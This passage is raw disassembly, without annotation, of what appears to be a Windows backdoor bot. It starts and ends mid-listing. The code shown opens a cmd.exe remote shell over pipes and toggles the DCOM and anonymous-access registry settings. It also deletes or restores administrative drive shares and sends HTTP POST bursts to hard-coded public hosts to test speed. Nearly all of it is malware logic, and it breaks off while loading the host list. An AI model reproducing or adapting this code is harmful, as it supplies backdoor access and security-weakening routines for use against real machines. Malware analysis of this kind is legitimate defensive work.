loc_41A058: ; CODE XREF: sub_419FD5+7C�j
xor eax, eax
leave
retn
sub_419FD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A05C proc near ; DATA XREF: sub_41A1B1+170�o
var_20C = byte ptr -20Ch
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20Ch
push ebx
push esi
push edi
mov esi, 200h
xor edi, edi
mov ebx, offset dword_4DBC54
loc_41A074: ; CODE XREF: sub_41A05C+79�j
; sub_41A05C+DB�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_4]
push edi
push edi
push eax
lea eax, [ebp+var_20C]
push esi
push eax
push dword_4DBC48
call ds:dword_427194 ; PeekNamedPipe
test eax, eax
jz loc_41A142
cmp [ebp+var_4], edi
jnz short loc_41A0D7
lea eax, [ebp+var_8]
push eax
push dword_4DBC44
call ds:dword_427190 ; GetExitCodeProcess
test eax, eax
jz short loc_41A0CD
cmp [ebp+var_8], 103h
jnz loc_41A166
loc_41A0CD: ; CODE XREF: sub_41A05C+62�j
push 0Ah
call ds:dword_427080 ; Sleep
jmp short loc_41A074
; ---------------------------------------------------------------------------
loc_41A0D7: ; CODE XREF: sub_41A05C+4E�j
xor eax, eax
cmp [ebp+var_4], edi
jbe short loc_41A0EE
loc_41A0DE: ; CODE XREF: sub_41A05C+90�j
cmp [ebp+eax+var_20C], 0Ah
jz short loc_41A13C
inc eax
cmp eax, [ebp+var_4]
jb short loc_41A0DE
loc_41A0EE: ; CODE XREF: sub_41A05C+80�j
mov [ebp+var_4], esi
loc_41A0F1: ; CODE XREF: sub_41A05C+E4�j
push esi
lea eax, [ebp+var_20C]
push edi
push eax
call sub_41BF70
add esp, 0Ch
lea eax, [ebp+var_C]
push edi
push eax
push [ebp+var_4]
lea eax, [ebp+var_20C]
push eax
push dword_4DBC48
call ds:dword_4270EC ; ReadFile
test eax, eax
jz short loc_41A18E
lea eax, [ebp+var_20C]
push eax
push ebx
push dword_4DBC88
call sub_419FD5
add esp, 0Ch
jmp loc_41A074
; ---------------------------------------------------------------------------
loc_41A13C: ; CODE XREF: sub_41A05C+8A�j
inc eax
mov [ebp+var_4], eax
jmp short loc_41A0F1
; ---------------------------------------------------------------------------
loc_41A142: ; CODE XREF: sub_41A05C+45�j
push offset unk_43A4C0
push ebx
push dword_4DBC88
call sub_419FD5
push [ebp+arg_0]
call sub_40B6D6
add esp, 10h
push 1
call ds:dword_4270D4 ; ExitThread
loc_41A166: ; CODE XREF: sub_41A05C+6B�j
call sub_419F6D
push offset unk_43A498
push ebx
push dword_4DBC88
call sub_419FD5
push [ebp+arg_0]
call sub_40B6D6
add esp, 10h
push edi
call ds:dword_4270D4 ; ExitThread
loc_41A18E: ; CODE XREF: sub_41A05C+C3�j
push offset unk_43A468
push ebx
push dword_4DBC88
call sub_419FD5
push [ebp+arg_0]
call sub_40B6D6
add esp, 10h
push edi
call ds:dword_4270D4 ; ExitThread
sub_41A05C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A1B1 proc near ; CODE XREF: sub_401ACD+24AA�p
; sub_416000+99�p
var_378 = byte ptr -378h
var_178 = byte ptr -178h
var_74 = dword ptr -74h
var_48 = dword ptr -48h
var_44 = word ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 378h
push ebx
push esi
push edi
call sub_419F6D
xor esi, esi
lea eax, [ebp+var_178]
push esi
push eax
push 104h
push esi
push offset aCmd_exe ; "cmd.exe"
push esi
call dword_4CBA90 ; SearchPathA
test eax, eax
jz loc_41A2AB
push 1
lea eax, [ebp+var_1C]
pop ebx
mov edi, ds:dword_427108
push esi
push eax
lea eax, [ebp+var_C]
mov [ebp+var_1C], 0Ch
push eax
lea eax, [ebp+var_10]
push eax
mov [ebp+var_14], ebx
mov [ebp+var_18], esi
call edi ; CreatePipe
test eax, eax
jz loc_41A2AB
lea eax, [ebp+var_1C]
push esi
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
call edi ; CreatePipe
test eax, eax
jz loc_41A2AB
mov edi, ds:dword_427104
push 3
push esi
push esi
push offset dword_4DBC4C
call edi ; GetCurrentProcess
push eax
push [ebp+var_8]
call edi ; GetCurrentProcess
push eax
call ds:dword_427100 ; DuplicateHandle
test eax, eax
jz short loc_41A2AB
push 10h
lea eax, [ebp+var_2C]
push esi
push eax
call sub_41BF70
push 44h
lea eax, [ebp+var_74]
pop edi
push edi
push esi
push eax
call sub_41BF70
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_3C], eax
mov eax, [ebp+var_C]
mov [ebp+var_38], eax
mov [ebp+var_34], eax
lea eax, [ebp+var_2C]
mov [ebp+var_74], edi
push eax
lea eax, [ebp+var_74]
push eax
push esi
push esi
push esi
push ebx
push esi
mov ebx, offset byte_43DB88
push esi
lea eax, [ebp+var_178]
push ebx
push eax
mov [ebp+var_48], 101h
mov [ebp+var_44], si
call ds:dword_427074 ; CreateProcessA
test eax, eax
jnz short loc_41A2B3
loc_41A2AB: ; CODE XREF: sub_41A1B1+2F�j
; sub_41A1B1+5C�j ...
or eax, 0FFFFFFFFh
jmp loc_41A361
; ---------------------------------------------------------------------------
loc_41A2B3: ; CODE XREF: sub_41A1B1+F8�j
push [ebp+var_4]
mov edi, ds:dword_427070
call edi ; CloseHandle
mov eax, [ebp+var_10]
push [ebp+var_28]
mov dword_4DBC48, eax
mov eax, [ebp+var_8]
mov dword_4DBC50, eax
mov eax, [ebp+var_2C]
mov dword_4DBC44, eax
call edi ; CloseHandle
mov eax, [ebp+arg_0]
cmp [ebp+arg_4], esi
mov dword_4DBC88, eax
jz short loc_41A2ED
push [ebp+arg_4]
jmp short loc_41A2EE
; ---------------------------------------------------------------------------
loc_41A2ED: ; CODE XREF: sub_41A1B1+135�j
push ebx
loc_41A2EE: ; CODE XREF: sub_41A1B1+13A�j
push offset dword_4DBC54
call sub_41C266
pop ecx
pop ecx
push esi
push 0Ah
push offset unk_43A524
call sub_40B3BA
mov edi, eax
mov ecx, [ebp+var_24]
imul edi, 234h
add esp, 0Ch
mov dword_43E918[edi], ecx
lea ecx, [ebp+var_30]
push ecx
push esi
push eax
push offset sub_41A05C
push esi
push esi
call ds:dword_427084 ; CreateThread
cmp eax, esi
mov dword_43E924[edi], eax
jnz short loc_41A35F
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_378]
push offset unk_43A4F0
push eax
call sub_41C266
lea eax, [ebp+var_378]
push eax
call sub_415D38
add esp, 10h
loc_41A35F: ; CODE XREF: sub_41A1B1+185�j
xor eax, eax
loc_41A361: ; CODE XREF: sub_41A1B1+FD�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A1B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A366 proc near ; DATA XREF: sub_401ACD+2DC8�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 98h
mov eax, [ebp+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+var_98]
rep movsd
pop edi
pop esi
push [ebp+var_8]
cmp [ebp+var_10], 0
mov dword ptr [eax+94h], 1
lea eax, [ebp+var_94]
push [ebp+var_C]
push eax
push [ebp+var_98]
jz short loc_41A3AD
call sub_41A3C6
jmp short loc_41A3B2
; ---------------------------------------------------------------------------
loc_41A3AD: ; CODE XREF: sub_41A366+3E�j
call sub_41A6EA
loc_41A3B2: ; CODE XREF: sub_41A366+45�j
add esp, 10h
push [ebp+var_14]
call sub_40B6D6
pop ecx
push 0
call ds:dword_4270D4 ; ExitThread
sub_41A366 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A3C6 proc near ; CODE XREF: sub_41A366+40�p
var_214 = byte ptr -214h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 214h
push esi
push edi
xor edi, edi
cmp dword_4CBAA4, edi
jnz loc_41A4F8
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push edi
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4CBA44 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A451
mov ax, word_439298
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push edi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4CB9F8 ; RegSetValueExA
test eax, eax
jz short loc_41A433
push offset dword_43A7C0
jmp short loc_41A438
; ---------------------------------------------------------------------------
loc_41A433: ; CODE XREF: sub_41A3C6+64�j
push offset dword_43A7A0
loc_41A438: ; CODE XREF: sub_41A3C6+6B�j
lea eax, [ebp+var_214]
push eax
call sub_41C266
pop ecx
pop ecx
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
jmp short loc_41A464
; ---------------------------------------------------------------------------
loc_41A451: ; CODE XREF: sub_41A3C6+36�j
lea eax, [ebp+var_214]
push offset dword_43A770
push eax
call sub_41C266
pop ecx
pop ecx
loc_41A464: ; CODE XREF: sub_41A3C6+89�j
cmp [ebp+arg_C], edi
jnz short loc_41A483
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A483: ; CODE XREF: sub_41A3C6+A1�j
lea eax, [ebp+var_214]
push eax
call sub_415D38
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push edi
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4CBA44 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A4F1
lea eax, [ebp+var_8]
push 4
push eax
push 4
push edi
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], 1
call dword_4CB9F8 ; RegSetValueExA
test eax, eax
jz short loc_41A4D3
push offset dword_43A720
jmp short loc_41A4D8
; ---------------------------------------------------------------------------
loc_41A4D3: ; CODE XREF: sub_41A3C6+104�j
push offset dword_43A6EC
loc_41A4D8: ; CODE XREF: sub_41A3C6+10B�j
lea eax, [ebp+var_214]
push eax
call sub_41C266
pop ecx
pop ecx
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
jmp short loc_41A50B
; ---------------------------------------------------------------------------
loc_41A4F1: ; CODE XREF: sub_41A3C6+E2�j
push offset dword_43A6B0
jmp short loc_41A4FD
; ---------------------------------------------------------------------------
loc_41A4F8: ; CODE XREF: sub_41A3C6+13�j
push offset dword_43A680
loc_41A4FD: ; CODE XREF: sub_41A3C6+130�j
lea eax, [ebp+var_214]
push eax
call sub_41C266
pop ecx
pop ecx
loc_41A50B: ; CODE XREF: sub_41A3C6+129�j
cmp [ebp+arg_C], edi
jnz short loc_41A52A
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A52A: ; CODE XREF: sub_41A3C6+148�j
lea eax, [ebp+var_214]
push eax
call sub_415D38
cmp dword_4CBACC, edi
pop ecx
jnz loc_41A6A5
push ebx
mov [ebp+var_4], edi
mov [ebp+var_14], edi
mov [ebp+var_C], edi
loc_41A54D: ; CODE XREF: sub_41A3C6+2C3�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push 0FFFFFFFFh
push eax
push 1F6h
push edi
call dword_4CB918
cmp eax, edi
mov [ebp+var_10], eax
jz short loc_41A5EA
cmp eax, 0EAh
jz short loc_41A5EA
mov esi, offset off_43A548
loc_41A57E: ; CODE XREF: sub_41A3C6+21D�j
push dword ptr [esi]
push edi
call sub_4191B8
pop ecx
pop ecx
push dword ptr [esi]
test eax, eax
jnz short loc_41A595
push offset dword_43A65C
jmp short loc_41A59A
; ---------------------------------------------------------------------------
loc_41A595: ; CODE XREF: sub_41A3C6+1C6�j
push offset dword_43A630
loc_41A59A: ; CODE XREF: sub_41A3C6+1CD�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41C360
add esp, 10h
cmp [ebp+arg_C], edi
jnz short loc_41A5CD
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A5CD: ; CODE XREF: sub_41A3C6+1EB�j
lea eax, [ebp+var_214]
push eax
call sub_415D38
add esi, 8
pop ecx
cmp esi, offset dword_43A568
jb short loc_41A57E
jmp loc_41A682
; ---------------------------------------------------------------------------
loc_41A5EA: ; CODE XREF: sub_41A3C6+1AA�j
; sub_41A3C6+1B1�j
mov esi, [ebp+var_8]
push 1
pop ebx
cmp [ebp+var_4], ebx
jb loc_41A679
loc_41A5F9: ; CODE XREF: sub_41A3C6+2AF�j
mov edi, [esi]
push edi
call sub_41E0B7
cmp word ptr [edi+eax*2-2], 24h
pop ecx
jnz short loc_41A66E
push edi
call sub_4190A5
push eax
push 0
call sub_4191B8
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41A628
push offset dword_43A60C
jmp short loc_41A62D
; ---------------------------------------------------------------------------
loc_41A628: ; CODE XREF: sub_41A3C6+259�j
push offset dword_43A5E0
loc_41A62D: ; CODE XREF: sub_41A3C6+260�j
lea eax, [ebp+var_214]
push 200h
push eax
call sub_41C360
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41A661
push 1
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A661: ; CODE XREF: sub_41A3C6+27F�j
lea eax, [ebp+var_214]
push eax
call sub_415D38
pop ecx
loc_41A66E: ; CODE XREF: sub_41A3C6+242�j
add esi, 28h
inc ebx
cmp ebx, [ebp+var_4]
jbe short loc_41A5F9
xor edi, edi
loc_41A679: ; CODE XREF: sub_41A3C6+22D�j
push [ebp+var_8]
call dword_4CBA64
loc_41A682: ; CODE XREF: sub_41A3C6+21F�j
cmp [ebp+var_10], 0EAh
jz loc_41A54D
lea eax, [ebp+var_214]
push offset dword_43A5B8
push eax
call sub_41C266
pop ecx
pop ecx
pop ebx
jmp short loc_41A6B8
; ---------------------------------------------------------------------------
loc_41A6A5: ; CODE XREF: sub_41A3C6+177�j
lea eax, [ebp+var_214]
push offset dword_43A588
push eax
call sub_41C266
pop ecx
pop ecx
loc_41A6B8: ; CODE XREF: sub_41A3C6+2DD�j
cmp [ebp+arg_C], edi
jnz short loc_41A6D6
push edi
lea eax, [ebp+var_214]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A6D6: ; CODE XREF: sub_41A3C6+2F5�j
lea eax, [ebp+var_214]
push eax
call sub_415D38
pop ecx
push 1
pop eax
pop edi
pop esi
leave
retn
sub_41A3C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6EA proc near ; CODE XREF: sub_41A366:loc_41A3AD�p
var_220 = byte ptr -220h
var_20 = byte ptr -20h
var_14 = byte ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 220h
push ebx
xor ebx, ebx
cmp dword_4CBAA4, ebx
push esi
jnz loc_41A818
lea eax, [ebp+var_4]
mov esi, 80000002h
push eax
push 2001Fh
push ebx
push offset aSoftwareMicros ; "Software\\Microsoft\\OLE"
push esi
call dword_4CBA44 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A775
mov ax, word_4392DC
mov word ptr [ebp+var_8+2], ax
lea eax, [ebp+var_8+2]
push eax
call sub_41B9C0
pop ecx
push eax
lea eax, [ebp+var_8+2]
push eax
push 1
push ebx
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_4CB9F8 ; RegSetValueExA
test eax, eax
jz short loc_41A757
push offset dword_43A938
jmp short loc_41A75C
; ---------------------------------------------------------------------------
loc_41A757: ; CODE XREF: sub_41A6EA+64�j
push offset dword_43A91C
loc_41A75C: ; CODE XREF: sub_41A6EA+6B�j
lea eax, [ebp+var_220]
push eax
call sub_41C266
pop ecx
pop ecx
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
jmp short loc_41A788
; ---------------------------------------------------------------------------
loc_41A775: ; CODE XREF: sub_41A6EA+36�j
lea eax, [ebp+var_220]
push offset dword_43A770
push eax
call sub_41C266
pop ecx
pop ecx
loc_41A788: ; CODE XREF: sub_41A6EA+89�j
cmp [ebp+arg_C], ebx
jnz short loc_41A7A7
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A7A7: ; CODE XREF: sub_41A6EA+A1�j
lea eax, [ebp+var_220]
push eax
call sub_415D38
pop ecx
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Control\\Lsa"
push esi
call dword_4CBA44 ; RegOpenKeyExA
test eax, eax
jnz short loc_41A811
lea eax, [ebp+var_8]
push 4
push eax
push 4
push ebx
push offset aRestrictanonym ; "restrictanonymous"
push [ebp+var_4]
mov [ebp+var_8], ebx
call dword_4CB9F8 ; RegSetValueExA
test eax, eax
jz short loc_41A7F3
push offset dword_43A8DC
jmp short loc_41A7F8
; ---------------------------------------------------------------------------
loc_41A7F3: ; CODE XREF: sub_41A6EA+100�j
push offset dword_43A8A4
loc_41A7F8: ; CODE XREF: sub_41A6EA+107�j
lea eax, [ebp+var_220]
push eax
call sub_41C266
pop ecx
pop ecx
push [ebp+var_4]
call dword_4CB9B0 ; RegCloseKey
jmp short loc_41A82B
; ---------------------------------------------------------------------------
loc_41A811: ; CODE XREF: sub_41A6EA+E2�j
push offset dword_43A868
jmp short loc_41A81D
; ---------------------------------------------------------------------------
loc_41A818: ; CODE XREF: sub_41A6EA+13�j
push offset dword_43A680
loc_41A81D: ; CODE XREF: sub_41A6EA+12C�j
lea eax, [ebp+var_220]
push eax
call sub_41C266
pop ecx
pop ecx
loc_41A82B: ; CODE XREF: sub_41A6EA+125�j
cmp [ebp+arg_C], ebx
jnz short loc_41A84A
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A84A: ; CODE XREF: sub_41A6EA+144�j
lea eax, [ebp+var_220]
push eax
call sub_415D38
cmp dword_4CBACC, ebx
pop ecx
jnz loc_41A9BF
push edi
mov esi, offset off_43A548
mov edi, 200h
loc_41A86E: ; CODE XREF: sub_41A6EA+1E9�j
push dword ptr [esi+4]
push dword ptr [esi]
push ebx
call sub_41910C
add esp, 0Ch
push dword ptr [esi]
test eax, eax
jnz short loc_41A889
push offset dword_43A848
jmp short loc_41A88E
; ---------------------------------------------------------------------------
loc_41A889: ; CODE XREF: sub_41A6EA+196�j
push offset dword_43A820
loc_41A88E: ; CODE XREF: sub_41A6EA+19D�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41C360
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_41A8BD
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A8BD: ; CODE XREF: sub_41A6EA+1B7�j
lea eax, [ebp+var_220]
push eax
call sub_415D38
add esi, 8
pop ecx
cmp esi, offset off_43A558
jb short loc_41A86E
call ds:dword_427198 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_41A9A7
loc_41A8E8: ; CODE XREF: sub_41A6EA+2B7�j
mov eax, [ebp+var_4]
and eax, 1
cmp al, 1
jnz loc_41A99C
cmp bl, 41h
jz loc_41A99C
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_20]
push esi
push offset aC_0 ; "%c:\\"
push 0Ah
push eax
call sub_41C360
add esp, 10h
lea eax, [ebp+var_20]
push eax
call dword_4CBA34 ; GetDriveTypeA
cmp eax, 3
jnz short loc_41A99C
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_41910C
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
jnz short loc_41A95A
push offset dword_43A848
jmp short loc_41A95F
; ---------------------------------------------------------------------------
loc_41A95A: ; CODE XREF: sub_41A6EA+267�j
push offset dword_43A820
loc_41A95F: ; CODE XREF: sub_41A6EA+26E�j
lea eax, [ebp+var_220]
push edi
push eax
call sub_41C360
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_41A98F
push 1
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A98F: ; CODE XREF: sub_41A6EA+289�j
lea eax, [ebp+var_220]
push eax
call sub_415D38
pop ecx
loc_41A99C: ; CODE XREF: sub_41A6EA+206�j
; sub_41A6EA+20F�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_41A8E8
loc_41A9A7: ; CODE XREF: sub_41A6EA+1F8�j
lea eax, [ebp+var_220]
push offset dword_43A7F0
push eax
call sub_41C266
pop ecx
xor ebx, ebx
pop ecx
pop edi
jmp short loc_41A9D2
; ---------------------------------------------------------------------------
loc_41A9BF: ; CODE XREF: sub_41A6EA+173�j
lea eax, [ebp+var_220]
push offset dword_43A588
push eax
call sub_41C266
pop ecx
pop ecx
loc_41A9D2: ; CODE XREF: sub_41A6EA+2D3�j
cmp [ebp+arg_C], ebx
jnz short loc_41A9F0
push ebx
lea eax, [ebp+var_220]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_409869
add esp, 14h
loc_41A9F0: ; CODE XREF: sub_41A6EA+2EB�j
lea eax, [ebp+var_220]
push eax
call sub_415D38
pop ecx
push 1
pop eax
pop esi
pop ebx
leave
retn
sub_41A6EA endp
; =============== S U B R O U T I N E =======================================
sub_41AA04 proc near ; CODE XREF: sub_41ABFB+CB�p
; sub_41ABFB+DD�p ...
arg_0 = dword ptr 4
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call sub_41C2C2
cdq
idiv [esp+arg_0]
mov eax, edx
retn
sub_41AA04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41AA1E proc near ; CODE XREF: sub_41ABFB+D4�p
; sub_41ABFB+E6�p ...
var_38 = dword ptr -38h
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_41B9C0
mov esi, 0FFh
pop ecx
cmp eax, esi
ja loc_41ABF7
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_41BF70
push [ebp+arg_0]
mov [ebp+var_28], 2
call sub_40A8F0
add esp, 10h
mov [ebp+var_24], eax
test eax, eax
jz loc_41ABF7
push 50h
call dword_4CB9D4 ; htons
push 6
push 1
push 2
mov [ebp+var_26], ax
call dword_4CBA54 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_41ABF7
lea ecx, [ebp+var_28]
push 10h
push ecx
push eax
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_41ABF7
push 32003h
call sub_41D9A5
mov edi, ds:dword_4270B0
mov ebx, eax
pop ecx
mov [ebp+var_8], ebx
call edi ; GetTickCount
push eax
call sub_41C2B8
call sub_41C2C2
cdq
idiv esi
mov [esp+38h+var_38], 32001h
push 0
push ebx
movsx esi, dl
call sub_41BF70
push 32000h
push esi
push ebx
call sub_41BF70
push ebx
call sub_41B9C0
push 323EAh
mov ebx, eax
call sub_41D9A5
add esp, 20h
mov esi, eax
push ebx
push [ebp+arg_0]
push offset aPostHttp1_0Hos ; "POST / HTTP/1.0\r\nHost: %s\r\nContent-Leng"...
push esi
call sub_41C266
push [ebp+var_8]
push esi
call sub_41C8A0
push offset asc_4349EC ; "\r\n"
push esi
call sub_41C8A0
push esi
call sub_41B9C0
mov ebx, eax
add esp, 24h
mov [ebp+var_10], ebx
call edi ; GetTickCount
mov dword ptr [ebp+var_18+4], eax
xor eax, eax
test ebx, ebx
mov [ebp+arg_0], eax
jbe short loc_41AB77
mov [ebp+var_C], ebx
mov ebx, 400h
jmp short loc_41AB47
; ---------------------------------------------------------------------------
loc_41AB44: ; CODE XREF: sub_41AA1E+157�j
mov eax, [ebp+arg_0]
loc_41AB47: ; CODE XREF: sub_41AA1E+124�j
mov ecx, [ebp+var_10]
push 0
sub ecx, eax
cmp ecx, ebx
jnb short loc_41AB57
push [ebp+var_C]
jmp short loc_41AB58
; ---------------------------------------------------------------------------
loc_41AB57: ; CODE XREF: sub_41AA1E+132�j
push ebx
loc_41AB58: ; CODE XREF: sub_41AA1E+137�j
add eax, esi
push eax
push [ebp+var_4]
call dword_4CBA24 ; send
cmp eax, 0FFFFFFFFh
jz short loc_41ABDE
add [ebp+arg_0], ebx
sub [ebp+var_C], ebx
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_10]
jb short loc_41AB44
loc_41AB77: ; CODE XREF: sub_41AA1E+11A�j
call edi ; GetTickCount
sub eax, dword ptr [ebp+var_18+4]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
fild [ebp+var_18]
fmul ds:flt_4276F4
fst [ebp+arg_0]
fcomp ds:flt_4276F0
fnstsw ax
sahf
jnz short loc_41AB9F
fld1
fstp [ebp+arg_0]
loc_41AB9F: ; CODE XREF: sub_41AA1E+17A�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push [ebp+var_8]
call sub_41BA91
push esi
call sub_41BA91
mov eax, [ebp+var_10]
and dword ptr [ebp+var_18+4], 0
mov dword ptr [ebp+var_18], eax
pop ecx
fild [ebp+var_18]
pop ecx
fdiv [ebp+arg_0]
fmul ds:flt_4276EC
fmul ds:flt_4276E8
call sub_41D174
loc_41ABD9: ; CODE XREF: sub_41AA1E+1DB�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41ABDE: ; CODE XREF: sub_41AA1E+149�j
push [ebp+var_4]
call dword_4CBA6C ; closesocket
push [ebp+var_8]
call sub_41BA91
push esi
call sub_41BA91
pop ecx
pop ecx
loc_41ABF7: ; CODE XREF: sub_41AA1E+19�j
; sub_41AA1E+42�j ...
xor eax, eax
jmp short loc_41ABD9
sub_41AA1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ABFB proc near ; CODE XREF: sub_401ACD+2E1E�p
var_26C = byte ptr -26Ch
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 8
mov [ebp+var_4], 3
mov [ebp+var_3C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_38], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_34], offset aVerio_fr ; "verio.fr"
mov [ebp+var_30], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_2C], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_28], offset aWww_belwue_de ; "www.belwue.de"
mov [ebp+var_24], offset aDe_yahoo_com ; "de.yahoo.com"
mov [ebp+var_20], offset aWww_google_it ; "www.google.it"
mov [ebp+var_6C], offset aWww_xo_net ; "www.xo.net"
